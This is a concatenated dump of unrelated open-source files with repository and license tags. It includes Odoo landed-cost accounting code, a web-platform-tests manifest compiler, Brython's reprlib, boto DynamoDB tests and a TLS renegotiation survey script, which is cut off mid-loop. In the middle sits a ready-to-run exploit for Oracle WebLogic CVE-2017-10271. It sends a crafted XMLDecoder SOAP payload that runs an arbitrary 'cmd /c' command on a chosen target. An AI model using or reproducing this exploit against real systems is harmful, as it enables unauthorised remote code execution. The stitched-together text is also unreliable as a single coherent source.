line.product_id.product_tmpl_id.id, context=context) debit_account_id = accounts['property_stock_valuation_account_id'] already_out_account_id = accounts['stock_account_output'] credit_account_id = line.cost_line_id.account_id.id or cost_product.property_account_expense.id or cost_product.categ_id.property_account_expense_categ.id if not credit_account_id: raise osv.except_osv(_('Error!'), _('Please configure Stock Expense Account for product: %s.') % (cost_product.name)) return self._create_account_move_line(cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=context) def _create_account_move_line(self, cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=None): """ Generate the account.move.line values to track the landed cost. Afterwards, for the goods that are already out of stock, we should create the out moves """ aml_obj = self.pool.get('account.move.line') base_line = { 'name': line.name, 'move_id': move_id, 'product_id': line.product_id.id, 'quantity': line.quantity, } debit_line = dict(base_line, account_id=debit_account_id) credit_line = dict(base_line, account_id=credit_account_id) diff = line.additional_landed_cost if diff > 0: debit_line['debit'] = diff credit_line['credit'] = diff else: # negative cost, reverse the entry debit_line['credit'] = -diff credit_line['debit'] = -diff aml_obj.create(cr, uid, debit_line, context=context) aml_obj.create(cr, uid, credit_line, context=context) #Create account move lines for quants already out of stock if qty_out > 0: debit_line = dict(base_line, name=(line.name + ": " + str(qty_out) + _(' already out')), quantity=qty_out, account_id=already_out_account_id) credit_line = dict(base_line, name=(line.name + ": " + str(qty_out) + _(' already out')), quantity=qty_out, account_id=debit_account_id) diff = diff * qty_out / line.quantity if diff > 0: debit_line['debit'] = diff credit_line['credit'] = diff else: # negative 
cost, reverse the entry debit_line['credit'] = -diff credit_line['debit'] = -diff aml_obj.create(cr, uid, debit_line, context=context) aml_obj.create(cr, uid, credit_line, context=context) # Ugly work-around to know if anglo-saxon accounting is used. In 9.0, we can use the # field 'anglo_saxon_accounting' on the company. if hasattr(self.pool['account.invoice.line'], '_anglo_saxon_sale_move_lines'): debit_line = dict(base_line, name=(line.name + ": " + str(qty_out) + _(' already out')), quantity=qty_out, account_id=credit_account_id) credit_line = dict(base_line, name=(line.name + ": " + str(qty_out) + _(' already out')), quantity=qty_out, account_id=already_out_account_id) if diff > 0: debit_line['debit'] = diff credit_line['credit'] = diff else: # negative cost, reverse the entry debit_line['credit'] = -diff credit_line['debit'] = -diff aml_obj.create(cr, uid, debit_line, context=context) aml_obj.create(cr, uid, credit_line, context=context) return True def _create_account_move(self, cr, uid, cost, context=None): vals = { 'journal_id': cost.account_journal_id.id, 'period_id': self.pool.get('account.period').find(cr, uid, cost.date, context=context)[0], 'date': cost.date, 'ref': cost.name } return self.pool.get('account.move').create(cr, uid, vals, context=context) def _check_sum(self, cr, uid, landed_cost, context=None): """ Will check if each cost line its valuation lines sum to the correct amount and if the overall total amount is correct also """ costcor = {} tot = 0 for valuation_line in landed_cost.valuation_adjustment_lines: if costcor.get(valuation_line.cost_line_id): costcor[valuation_line.cost_line_id] += valuation_line.additional_landed_cost else: costcor[valuation_line.cost_line_id] = valuation_line.additional_landed_cost tot += valuation_line.additional_landed_cost prec = self.pool['decimal.precision'].precision_get(cr, uid, 'Account') # float_compare returns 0 for equal amounts res = not bool(float_compare(tot, landed_cost.amount_total, 
precision_digits=prec)) for costl in costcor.keys(): if float_compare(costcor[costl], costl.price_unit, precision_digits=prec): res = False return res def button_validate(self, cr, uid, ids, context=None): quant_obj = self.pool.get('stock.quant') for cost in self.browse(cr, uid, ids, context=context): if cost.state != 'draft': raise Warning(_('Only draft landed costs can be validated')) if not cost.valuation_adjustment_lines or not self._check_sum(cr, uid, cost, context=context): raise osv.except_osv(_('Error!'), _('You cannot validate a landed cost which has no valid valuation lines.')) move_id = self._create_account_move(cr, uid, cost, context=context) for line in cost.valuation_adjustment_lines: if not line.move_id: continue per_unit = line.final_cost / line.quantity diff = per_unit - line.former_cost_per_unit # If the precision required for the variable diff is larger than the accounting # precision, inconsistencies between the stock valuation and the accounting entries # may arise. # For example, a landed cost of 15 divided in 13 units. If the products leave the # stock one unit at a time, the amount related to the landed cost will correspond to # round(15/13, 2)*13 = 14.95. To avoid this case, we split the quant in 12 + 1, then # record the difference on the new quant. # We need to make sure to able to extract at least one unit of the product. There is # an arbitrary minimum quantity set to 2.0 from which we consider we can extract a # unit and adapt the cost. 
curr_rounding = line.move_id.company_id.currency_id.rounding diff_rounded = float_round(diff, precision_rounding=curr_rounding) diff_correct = diff_rounded quants = line.move_id.quant_ids.sorted(key=lambda r: r.qty, reverse=True) quant_correct = False if quants\ and float_compare(quants[0].product_id.uom_id.rounding, 1.0, precision_digits=1) == 0\ and float_compare(line.quantity * diff, line.quantity * diff_rounded, precision_rounding=curr_rounding) != 0\ and float_compare(quants[0].qty, 2.0, precision_rounding=quants[0].product_id.uom_id.rounding) >= 0: # Search for existing quant of quantity = 1.0 to avoid creating a new one quant_correct = quants.filtered(lambda r: float_compare(r.qty, 1.0, precision_rounding=quants[0].product_id.uom_id.rounding) == 0) if not quant_correct: quant_correct = quant_obj._quant_split(cr, uid, quants[0], quants[0].qty - 1.0, context=context) else: quant_correct = quant_correct[0] quants = quants - quant_correct diff_correct += (line.quantity * diff) - (line.quantity * diff_rounded) diff = diff_rounded quant_dict = {} for quant in quants: quant_dict[quant.id] = quant.cost + diff if quant_correct: quant_dict[quant_correct.id] = quant_correct.cost + diff_correct for key, value in quant_dict.items(): quant_obj.write(cr, SUPERUSER_ID, key, {'cost': value}, context=context) qty_out = 0 for quant in line.move_id.quant_ids: if quant.location_id.usage != 'internal': qty_out += quant.qty self._create_accounting_entries(cr, uid, line, move_id, qty_out, context=context) self.write(cr, uid, cost.id, {'state': 'done', 'account_move_id': move_id}, context=context) return True def button_cancel(self, cr, uid, ids, context=None): cost = self.browse(cr, uid, ids, context=context) if cost.state == 'done': raise Warning(_('Validated landed costs cannot be cancelled, ' 'but you could create negative landed costs to reverse them')) return cost.write({'state': 'cancel'}) def unlink(self, cr, uid, ids, context=None): # cancel or raise first 
self.button_cancel(cr, uid, ids, context) return super(stock_landed_cost, self).unlink(cr, uid, ids, context=context) def compute_landed_cost(self, cr, uid, ids, context=None): line_obj = self.pool.get('stock.valuation.adjustment.lines') unlink_ids = line_obj.search(cr, uid, [('cost_id', 'in', ids)], context=context) line_obj.unlink(cr, uid, unlink_ids, context=context) digits = dp.get_precision('Product Price')(cr) towrite_dict = {} for cost in self.browse(cr, uid, ids, context=None): if not cost.picking_ids: continue picking_ids = [p.id for p in cost.picking_ids] total_qty = 0.0 total_cost = 0.0 total_weight = 0.0 total_volume = 0.0 total_line = 0.0 vals = self.get_valuation_lines(cr, uid, [cost.id], picking_ids=picking_ids, context=context) for v in vals: for line in cost.cost_lines: v.update({'cost_id': cost.id, 'cost_line_id': line.id}) self.pool.get('stock.valuation.adjustment.lines').create(cr, uid, v, context=context) total_qty += v.get('quantity', 0.0) total_cost += v.get('former_cost', 0.0) total_weight += v.get('weight', 0.0) total_volume += v.get('volume', 0.0) total_line += 1 for line in cost.cost_lines: value_split = 0.0 for valuation in cost.valuation_adjustment_lines: value = 0.0 if valuation.cost_line_id and valuation.cost_line_id.id == line.id: if line.split_method == 'by_quantity' and total_qty: per_unit = (line.price_unit / total_qty) value = valuation.quantity * per_unit elif line.split_method == 'by_weight' and total_weight: per_unit = (line.price_unit / total_weight) value = valuation.weight * per_unit elif line.split_method == 'by_volume' and total_volume: per_unit = (line.price_unit / total_volume) value = valuation.volume * per_unit elif line.split_method == 'equal': value = (line.price_unit / total_line) elif line.split_method == 'by_current_cost_price' and total_cost: per_unit = (line.price_unit / total_cost) value = valuation.former_cost * per_unit else: value = (line.price_unit / total_line) if digits: value = float_round(value, 
precision_digits=digits[1], rounding_method='UP') fnc = min if line.price_unit > 0 else max value = fnc(value, line.price_unit - value_split) value_split += value if valuation.id not in towrite_dict: towrite_dict[valuation.id] = value else: towrite_dict[valuation.id] += value if towrite_dict: for key, value in towrite_dict.items(): line_obj.write(cr, uid, key, {'additional_landed_cost': value}, context=context) return True class stock_landed_cost_lines(osv.osv): _name = 'stock.landed.cost.lines' _description = 'Stock Landed Cost Lines' def onchange_product_id(self, cr, uid, ids, product_id=False, context=None): result = {} if not product_id: return {'value': {'quantity': 0.0, 'price_unit': 0.0}} product = self.pool.get('product.product').browse(cr, uid, product_id, context=context) result['name'] = product.name result['split_method'] = product.split_method result['price_unit'] = product.standard_price result['account_id'] = product.property_account_expense and product.property_account_expense.id or product.categ_id.property_account_expense_categ.id return {'value': result} _columns = { 'name': fields.char('Description'), 'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'), 'product_id': fields.many2one('product.product', 'Product', required=True), 'price_unit': fields.float('Cost', required=True, digits_compute=dp.get_precision('Product Price')), 'split_method': fields.selection(product.SPLIT_METHOD, string='Split Method', required=True), 'account_id': fields.many2one('account.account', 'Account', domain=[('type', '<>', 'view'), ('type', '<>', 'closed')]), } class stock_valuation_adjustment_lines(osv.osv): _name = 'stock.valuation.adjustment.lines' _description = 'Stock Valuation Adjustment Lines' def _amount_final(self, cr, uid, ids, name, args, context=None): result = {} for line in self.browse(cr, uid, ids, context=context): result[line.id] = { 'former_cost_per_unit': 0.0, 'final_cost': 0.0, } 
result[line.id]['former_cost_per_unit'] = (line.former_cost / line.quantity if line.quantity else 1.0) result[line.id]['final_cost'] = (line.former_cost + line.additional_landed_cost) return result def _get_name(self, cr, uid, ids, name, arg, context=None): res = {} for line in self.browse(cr, uid, ids, context=context): res[line.id] = line.product_id.code or line.product_id.name or '' if line.cost_line_id: res[line.id] += ' - ' + line.cost_line_id.name return res _columns = { 'name': fields.function(_get_name, type='char', string='Description', store=True), 'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'), 'cost_line_id': fields.many2one('stock.landed.cost.lines', 'Cost Line', readonly=True), 'move_id': fields.many2one('stock.move', 'Stock Move', readonly=True), 'product_id': fields.many2one('product.product', 'Product', required=True), 'quantity': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True), 'weight': fields.float('Weight', digits_compute=dp.get_precision('Product Unit of Measure')), 'volume': fields.float('Volume', digits_compute=dp.get_precision('Product Unit of Measure')), 'former_cost': fields.float('Former Cost', digits_compute=dp.get_precision('Product Price')), 'former_cost_per_unit': fields.function(_amount_final, multi='cost', string='Former Cost(Per Unit)', type='float', store=True, digits=0), 'additional_landed_cost': fields.float('Additional Landed Cost', digits_compute=dp.get_precision('Product Price')), 'final_cost': fields.function(_amount_final, multi='cost', string='Final Cost', type='float', store=True, digits=0), } _defaults = { 'quantity': 1.0, 'weight': 1.0, 'volume': 1.0, } # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
askeing/servo
tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/wptmanifest/backends/static.py
29
6487
import operator from ..node import NodeVisitor from ..parser import parse class Compiler(NodeVisitor): """Compiler backend that evaluates conditional expressions to give static output""" def compile(self, tree, expr_data, data_cls_getter=None, **kwargs): """Compile a raw AST into a form with conditional expressions evaluated. tree - The root node of the wptmanifest AST to compile expr_data - A dictionary of key / value pairs to use when evaluating conditional expressions data_cls_getter - A function taking two parameters; the previous output node and the current ast node and returning the class of the output node to use for the current ast node """ self._kwargs = kwargs self.expr_data = expr_data if data_cls_getter is None: self.data_cls_getter = lambda x, y: ManifestItem else: self.data_cls_getter = data_cls_getter self.output_node = None self.visit(tree) return self.output_node def visit_DataNode(self, node): output_parent = self.output_node if self.output_node is None: assert node.parent is None self.output_node = self.data_cls_getter(None, None)(None, **self._kwargs) else: self.output_node = self.data_cls_getter(self.output_node, node)(node.data) for child in node.children: self.visit(child) if output_parent is not None: output_parent.append(self.output_node) self.output_node = self.output_node.parent def visit_KeyValueNode(self, node): key_name = node.data key_value = None for child in node.children: value = self.visit(child) if value is not None: key_value = value break if key_value is not None: self.output_node.set(key_name, key_value) def visit_ValueNode(self, node): return node.data def visit_AtomNode(self, node): return node.data def visit_ListNode(self, node): return [self.visit(child) for child in node.children] def visit_ConditionalNode(self, node): assert len(node.children) == 2 if self.visit(node.children[0]): return self.visit(node.children[1]) def visit_StringNode(self, node): value = node.data for child in node.children: value = 
self.visit(child)(value) return value def visit_NumberNode(self, node): if "." in node.data: return float(node.data) else: return int(node.data) def visit_VariableNode(self, node): value = self.expr_data[node.data] for child in node.children: value = self.visit(child)(value) return value def visit_IndexNode(self, node): assert len(node.children) == 1 index = self.visit(node.children[0]) return lambda x: x[index] def visit_UnaryExpressionNode(self, node): assert len(node.children) == 2 operator = self.visit(node.children[0]) operand = self.visit(node.children[1]) return operator(operand) def visit_BinaryExpressionNode(self, node): assert len(node.children) == 3 operator = self.visit(node.children[0]) operand_0 = self.visit(node.children[1]) operand_1 = self.visit(node.children[2]) return operator(operand_0, operand_1) def visit_UnaryOperatorNode(self, node): return {"not": operator.not_}[node.data] def visit_BinaryOperatorNode(self, node): return {"and": operator.and_, "or": operator.or_, "==": operator.eq, "!=": operator.ne}[node.data] class ManifestItem(object): def __init__(self, name, **kwargs): self.parent = None self.name = name self.children = [] self._data = {} def __repr__(self): return "<ManifestItem %s>" % (self.name) def __str__(self): rv = [repr(self)] for item in self.children: rv.extend(" %s" % line for line in str(item).split("\n")) return "\n".join(rv) def set_defaults(self): pass @property def is_empty(self): if self._data: return False return all(child.is_empty for child in self.children) @property def root(self): node = self while node.parent is not None: node = node.parent return node def has_key(self, key): for node in [self, self.root]: if key in node._data: return True return False def get(self, key): for node in [self, self.root]: if key in node._data: return node._data[key] raise KeyError def set(self, name, value): self._data[name] = value def remove(self): if self.parent: self.parent._remove_child(self) def _remove_child(self, child): 
self.children.remove(child) child.parent = None def iterchildren(self, name=None): for item in self.children: if item.name == name or name is None: yield item def _flatten(self): rv = {} for node in [self, self.root]: for name, value in node._data.iteritems(): if name not in rv: rv[name] = value return rv def iteritems(self): for item in self._flatten().iteritems(): yield item def iterkeys(self): for item in self._flatten().iterkeys(): yield item def itervalues(self): for item in self._flatten().itervalues(): yield item def append(self, child): child.parent = self self.children.append(child) return child def compile_ast(ast, expr_data, data_cls_getter=None, **kwargs): return Compiler().compile(ast, expr_data, data_cls_getter=data_cls_getter, **kwargs) def compile(stream, expr_data, data_cls_getter=None, **kwargs): return compile_ast(parse(stream), expr_data, data_cls_getter=data_cls_getter, **kwargs)
mpl-2.0
d40223223/2015cdbg6-40223223
static/Brython3.1.1-20150328-091302/Lib/reprlib.py
923
5110
"""Redo the builtin repr() (representation) but with limits on most sizes.""" __all__ = ["Repr", "repr", "recursive_repr"] import builtins from itertools import islice try: from _thread import get_ident except ImportError: from _dummy_thread import get_ident def recursive_repr(fillvalue='...'): 'Decorator to make a repr function return fillvalue for a recursive call' def decorating_function(user_function): repr_running = set() def wrapper(self): key = id(self), get_ident() if key in repr_running: return fillvalue repr_running.add(key) try: result = user_function(self) finally: repr_running.discard(key) return result # Can't use functools.wraps() here because of bootstrap issues wrapper.__module__ = getattr(user_function, '__module__') wrapper.__doc__ = getattr(user_function, '__doc__') wrapper.__name__ = getattr(user_function, '__name__') wrapper.__annotations__ = getattr(user_function, '__annotations__', {}) return wrapper return decorating_function class Repr: def __init__(self): self.maxlevel = 6 self.maxtuple = 6 self.maxlist = 6 self.maxarray = 5 self.maxdict = 4 self.maxset = 6 self.maxfrozenset = 6 self.maxdeque = 6 self.maxstring = 30 self.maxlong = 40 self.maxother = 30 def repr(self, x): return self.repr1(x, self.maxlevel) def repr1(self, x, level): typename = type(x).__name__ if ' ' in typename: parts = typename.split() typename = '_'.join(parts) if hasattr(self, 'repr_' + typename): return getattr(self, 'repr_' + typename)(x, level) else: return self.repr_instance(x, level) def _repr_iterable(self, x, level, left, right, maxiter, trail=''): n = len(x) if level <= 0 and n: s = '...' 
else: newlevel = level - 1 repr1 = self.repr1 pieces = [repr1(elem, newlevel) for elem in islice(x, maxiter)] if n > maxiter: pieces.append('...') s = ', '.join(pieces) if n == 1 and trail: right = trail + right return '%s%s%s' % (left, s, right) def repr_tuple(self, x, level): return self._repr_iterable(x, level, '(', ')', self.maxtuple, ',') def repr_list(self, x, level): return self._repr_iterable(x, level, '[', ']', self.maxlist) def repr_array(self, x, level): header = "array('%s', [" % x.typecode return self._repr_iterable(x, level, header, '])', self.maxarray) def repr_set(self, x, level): x = _possibly_sorted(x) return self._repr_iterable(x, level, 'set([', '])', self.maxset) def repr_frozenset(self, x, level): x = _possibly_sorted(x) return self._repr_iterable(x, level, 'frozenset([', '])', self.maxfrozenset) def repr_deque(self, x, level): return self._repr_iterable(x, level, 'deque([', '])', self.maxdeque) def repr_dict(self, x, level): n = len(x) if n == 0: return '{}' if level <= 0: return '{...}' newlevel = level - 1 repr1 = self.repr1 pieces = [] for key in islice(_possibly_sorted(x), self.maxdict): keyrepr = repr1(key, newlevel) valrepr = repr1(x[key], newlevel) pieces.append('%s: %s' % (keyrepr, valrepr)) if n > self.maxdict: pieces.append('...') s = ', '.join(pieces) return '{%s}' % (s,) def repr_str(self, x, level): s = builtins.repr(x[:self.maxstring]) if len(s) > self.maxstring: i = max(0, (self.maxstring-3)//2) j = max(0, self.maxstring-3-i) s = builtins.repr(x[:i] + x[len(x)-j:]) s = s[:i] + '...' + s[len(s)-j:] return s def repr_int(self, x, level): s = builtins.repr(x) # XXX Hope this isn't too slow... if len(s) > self.maxlong: i = max(0, (self.maxlong-3)//2) j = max(0, self.maxlong-3-i) s = s[:i] + '...' 
+ s[len(s)-j:] return s def repr_instance(self, x, level): try: s = builtins.repr(x) # Bugs in x.__repr__() can cause arbitrary # exceptions -- then make up something except Exception: return '<%s instance at %x>' % (x.__class__.__name__, id(x)) if len(s) > self.maxother: i = max(0, (self.maxother-3)//2) j = max(0, self.maxother-3-i) s = s[:i] + '...' + s[len(s)-j:] return s def _possibly_sorted(x): # Since not all sequences of items can be sorted and comparison # functions may raise arbitrary exceptions, return an unsorted # sequence in that case. try: return sorted(x) except Exception: return list(x) aRepr = Repr() repr = aRepr.repr
gpl-3.0
jm33-m0/massExpConsole
exploits/weblogic/weblogic_cve-2017-10271.py
1
3050
#!/usr/bin/python3 # pylint: disable=invalid-name, line-too-long, import-error, no-member, missing-docstring, broad-except import argparse import sys import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def payload_command(command_in): html_escape_table = { "&": "&amp;", '"': "&quot;", "'": "&apos;", ">": "&gt;", "<": "&lt;", } command_filtered = "<string>" + \ "".join(html_escape_table.get(c, c) for c in command_in)+"</string>" payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \ " <soapenv:Header> " \ " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \ " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \ " <void class=\"java.lang.ProcessBuilder\"> \n" \ " <array class=\"java.lang.String\" length=\"3\">" \ " <void index = \"0\"> " \ " <string>cmd</string> " \ " </void> " \ " <void index = \"1\"> " \ " <string>/c</string> " \ " </void> " \ " <void index = \"2\"> " \ + command_filtered + \ " </void> " \ " </array>" \ " <void method=\"start\"/>" \ " </void>" \ " </java>" \ " </work:WorkContext>" \ " </soapenv:Header>" \ " <soapenv:Body/>" \ "</soapenv:Envelope>" return payload_1 def do_post(urlin, command_in): payload_url = urlin + "/wls-wsat/CoordinatorPortType" payload_header = {'content-type': 'text/xml'} result = requests.post(payload_url, payload_command( command_in), headers=payload_header, verify=False) if result.status_code == 500: print("Command Executed\n") else: print("Something Went Wrong\n") parser = argparse.ArgumentParser(description='weblogic_cve-2017-10271') parser.add_argument('-c', type=str, required=True, help='command to execute on the target') parser.add_argument('-t', type=str, required=True, help='target url') args = parser.parse_args() try: command = args.c url_in = "http://" + args.t do_post(url_in, command) except (KeyboardInterrupt, EOFError, 
SystemExit): sys.exit(0)
gpl-3.0
TiVoMaker/boto
tests/unit/dynamodb/test_types.py
74
6285
#!/usr/bin/env python # Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. 
#
from decimal import Decimal
from tests.compat import unittest
from boto.compat import six
from boto.dynamodb import types
from boto.dynamodb.exceptions import DynamoDBNumberError


class TestDynamizer(unittest.TestCase):
    """Round-trip tests for the type (de)serializers in boto.dynamodb.types.

    Each test pairs a Python value with its DynamoDB wire representation
    ({'S': ...}, {'N': ...}, {'SS': [...]}, {'M': {...}}, etc.).
    """

    def setUp(self):
        # No shared fixtures: each test constructs its own Dynamizer.
        pass

    def test_encoding_to_dynamodb(self):
        # Python value -> DynamoDB attribute-value dict.
        dynamizer = types.Dynamizer()
        self.assertEqual(dynamizer.encode('foo'), {'S': 'foo'})
        self.assertEqual(dynamizer.encode(54), {'N': '54'})
        self.assertEqual(dynamizer.encode(Decimal('1.1')), {'N': '1.1'})
        self.assertEqual(dynamizer.encode(set([1, 2, 3])),
                         {'NS': ['1', '2', '3']})
        # Set iteration order is unspecified, so accept either ordering.
        self.assertIn(dynamizer.encode(set(['foo', 'bar'])),
                      ({'SS': ['foo', 'bar']}, {'SS': ['bar', 'foo']}))
        self.assertEqual(dynamizer.encode(types.Binary(b'\x01')),
                         {'B': 'AQ=='})
        self.assertEqual(dynamizer.encode(set([types.Binary(b'\x01')])),
                         {'BS': ['AQ==']})
        # Lists and dicts encode recursively into 'L' and 'M' containers.
        self.assertEqual(dynamizer.encode(['foo', 54, [1]]),
                         {'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]})
        self.assertEqual(dynamizer.encode({'foo': 'bar', 'hoge': {'sub': 1}}),
                         {'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}})
        self.assertEqual(dynamizer.encode(None), {'NULL': True})
        self.assertEqual(dynamizer.encode(False), {'BOOL': False})

    def test_decoding_to_dynamodb(self):
        # DynamoDB attribute-value dict -> Python value (inverse of the above).
        dynamizer = types.Dynamizer()
        self.assertEqual(dynamizer.decode({'S': 'foo'}), 'foo')
        self.assertEqual(dynamizer.decode({'N': '54'}), 54)
        self.assertEqual(dynamizer.decode({'N': '1.1'}), Decimal('1.1'))
        self.assertEqual(dynamizer.decode({'NS': ['1', '2', '3']}),
                         set([1, 2, 3]))
        self.assertEqual(dynamizer.decode({'SS': ['foo', 'bar']}),
                         set(['foo', 'bar']))
        self.assertEqual(dynamizer.decode({'B': 'AQ=='}), types.Binary(b'\x01'))
        self.assertEqual(dynamizer.decode({'BS': ['AQ==']}),
                         set([types.Binary(b'\x01')]))
        self.assertEqual(dynamizer.decode({'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]}),
                         ['foo', 54, [1]])
        self.assertEqual(dynamizer.decode({'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}}),
                         {'foo': 'bar', 'hoge': {'sub': 1}})
        self.assertEqual(dynamizer.decode({'NULL': True}), None)
        self.assertEqual(dynamizer.decode({'BOOL': False}), False)

    def test_float_conversion_errors(self):
        dynamizer = types.Dynamizer()
        # When supporting decimals, certain floats will work:
        self.assertEqual(dynamizer.encode(1.25), {'N': '1.25'})
        # And some will generate errors, which is why it's best
        # to just use Decimals directly:
        with self.assertRaises(DynamoDBNumberError):
            dynamizer.encode(1.1)

    def test_non_boolean_conversions(self):
        # NonBooleanDynamizer encodes True as the number 1, not as a BOOL.
        dynamizer = types.NonBooleanDynamizer()
        self.assertEqual(dynamizer.encode(True), {'N': '1'})

    def test_lossy_float_conversions(self):
        dynamizer = types.LossyFloatDynamizer()
        # Just testing the differences here, specifically float conversions:
        self.assertEqual(dynamizer.encode(1.1), {'N': '1.1'})
        self.assertEqual(dynamizer.decode({'N': '1.1'}), 1.1)
        self.assertEqual(dynamizer.encode(set([1.1])),
                         {'NS': ['1.1']})
        self.assertEqual(dynamizer.decode({'NS': ['1.1', '2.2', '3.3']}),
                         set([1.1, 2.2, 3.3]))


class TestBinary(unittest.TestCase):
    """Behaviour of the Binary wrapper type across Python 2 and Python 3."""

    def test_good_input(self):
        data = types.Binary(b'\x01')
        self.assertEqual(b'\x01', data)
        self.assertEqual(b'\x01', bytes(data))

    def test_non_ascii_good_input(self):
        # Binary data that is out of ASCII range
        data = types.Binary(b'\x88')
        self.assertEqual(b'\x88', data)
        self.assertEqual(b'\x88', bytes(data))

    @unittest.skipUnless(six.PY2, "Python 2 only")
    def test_bad_input(self):
        with self.assertRaises(TypeError):
            types.Binary(1)

    @unittest.skipUnless(six.PY3, "Python 3 only")
    def test_bytes_input(self):
        # On Python 3 an int follows bytes(1) semantics: a zero-filled buffer.
        data = types.Binary(1)
        self.assertEqual(data, b'\x00')
        self.assertEqual(data.value, b'\x00')

    @unittest.skipUnless(six.PY2, "Python 2 only")
    def test_unicode_py2(self):
        # It's dirty. But remains for backward compatibility.
        data = types.Binary(u'\x01')
        self.assertEqual(data, b'\x01')
        self.assertEqual(bytes(data), b'\x01')

        # Delegate to built-in b'\x01' == u'\x01'
        # In Python 2.x these are considered equal
        self.assertEqual(data, u'\x01')

        # Check that the value field is of type bytes
        self.assertEqual(type(data.value), bytes)

    @unittest.skipUnless(six.PY3, "Python 3 only")
    def test_unicode_py3(self):
        with self.assertRaises(TypeError):
            types.Binary(u'\x01')


if __name__ == '__main__':
    unittest.main()
mit
dingdang2012/tlsprober
analyze/alexa_ev_analyze.py
3
3467
# Copyright 2010-2012 Opera Software ASA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

'''
Created on 2. okt. 2010

@author: Yngve
'''

"""Report Renego patched/unpatched based on Alexa ranking
only sites with EV certificates"""

import sys, os, subprocess, time, os.path
import csv

sys.path.insert(1, os.path.join(".."))

import libinit

from optparse import OptionParser
import probedb.standalone
import probedb.probedata2.models as ProbeData
import probedb.resultdb2.models as Results

options_config = OptionParser()

options_config.add_option("--testbase2", action="store_true", dest="use_testbase2")
options_config.add_option("--threads", action="store", type="int", dest="threads", default=20)
options_config.add_option("--id", action="store", type="int", dest="run_id", default=0)
options_config.add_option("--verbose", action="store_true", dest="verbose")

(options, args) = options_config.parse_args()

# A probe-run id is effectively required: everything below queries that run.
# Fail with a usage message instead of a NameError on the undefined `run`.
if not options.run_id:
    options_config.error("--id <probe run id> is required")

run = ProbeData.ProbeRun.objects.get(id = options.run_id)

main_result_list = Results.ResultSummaryList.objects.filter(part_of_run__id=run.id)[0]

# Hosts that support secure renegotiation (RFC 5746) and present an EV cert.
patched = main_result_list.GetAnalyze(
    filter = {Results.ResultSummaryList.QUERY_CONDITION: [
        Results.ResultCondition.RESULTC_RENEGO,
        Results.ResultCondition.RESULTC_EXTENDED_VALIDATION_CERT]},
    summaries = {"hosts": [Results.ResultSummaryList.RESULT_HOSTS]}
    )

# Hosts that still perform legacy (insecure) renegotiation and present an EV cert.
unpatched_renego = main_result_list.GetAnalyze(
    filter = {Results.ResultSummaryList.QUERY_CONDITION: [
        Results.ResultCondition.RESULTC_NONRENEGO,
        Results.ResultCondition.RESULTC_PERFORM_RENEGO,
        Results.ResultCondition.RESULTC_EXTENDED_VALIDATION_CERT]},
    summaries = {"hosts": [Results.ResultSummaryList.RESULT_HOSTS]}
    )

# All EV-cert hosts in the run, regardless of renegotiation status.
# (Renamed from `all`, which shadowed the builtin.)
all_ev = main_result_list.GetAnalyze(
    filter = {Results.ResultSummaryList.QUERY_CONDITION: [
        Results.ResultCondition.RESULTC_EXTENDED_VALIDATION_CERT]},
    summaries = {"hosts": [Results.ResultSummaryList.RESULT_HOSTS]}
    )

# Per-Alexa-rating counters:
#   rating -> {"total": n, "patched": n, "unpatched_renego": n}
# Hosts without an Alexa rating (rating <= 0) are ignored.
summary = {}
for (update_field, hostlist) in [("total", all_ev), ("patched", patched),
                                 ("unpatched_renego", unpatched_renego)]:
    for x in hostlist["hosts"]:
        if x.servername.alexa_rating > 0:
            summary.setdefault(x.servername.alexa_rating,
                               {"patched": 0, "total": 0, "unpatched_renego": 0}
                               )[update_field] += 1

total_patched = 0
total = 0
total_renego = 0

# Write cumulative statistics ordered by Alexa rating.  "wb" because the
# Python 2 csv module needs a binary-mode file to avoid doubled line endings;
# the `with` block guarantees the file is flushed and closed.
with open("alexa_ev_renego_rating.csv", "wb") as csv_file:
    report = csv.writer(csv_file)
    report.writerow(["ranking", "site patched", "site total", "total patched",
                     "total", "patched percent", "unpatched renego",
                     "total unpatched renego", "unpatched renego percent"])

    for rating, counts in sorted(summary.iteritems()):
